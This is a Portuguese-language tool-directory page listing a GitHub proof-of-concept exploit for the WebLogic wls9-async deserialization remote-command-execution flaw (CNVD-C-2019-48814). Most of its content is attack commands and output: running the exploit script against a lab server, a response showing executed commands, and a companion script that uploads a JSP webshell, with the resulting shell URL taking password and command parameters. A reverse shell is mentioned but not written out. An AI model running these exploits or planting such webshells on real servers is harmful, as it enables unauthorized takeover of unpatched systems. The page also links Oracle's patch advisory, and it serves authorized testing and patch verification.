Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CNVD-C-2019-48814 — Vulnerabilidade de execução remota de comandos por desserialização no WebLogic wls9-async | Kitploit
Ferramentas/GitHubGitHub/jas502n/cnvd-c-2019-48814
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubjas502n/cnvd-c-2019-48814

CNVD-C-2019-48814

Vulnerabilidade de execução remota de comandos por desserialização no WebLogic wls9-async

Ver Repositório
2399110há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CNVD-C-2019-48814

Vulnerabilidade de execução remota de comandos por desserialização wls9-async no WebLogic

PoC de eco para WebLogic

Atualização do patch:


https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

Reprodução da vulnerabilidade:

http://10.10.20.166:7001/_async/AsyncResponseService
curl -i http://10.10.20.166:7001/_async/favicon.ico

Vídeo CNVD-C-2019-48814

CNVD-C-2019-48814

python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

Usar RMI

CVE-2017-10271 Sem patch

webshell windows-linux

atualização: nome personalizado do webshell, adequado para upload de webshell no Windows ou Linux

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

shell reversa

ver comando

webshell

Baixar ferramenta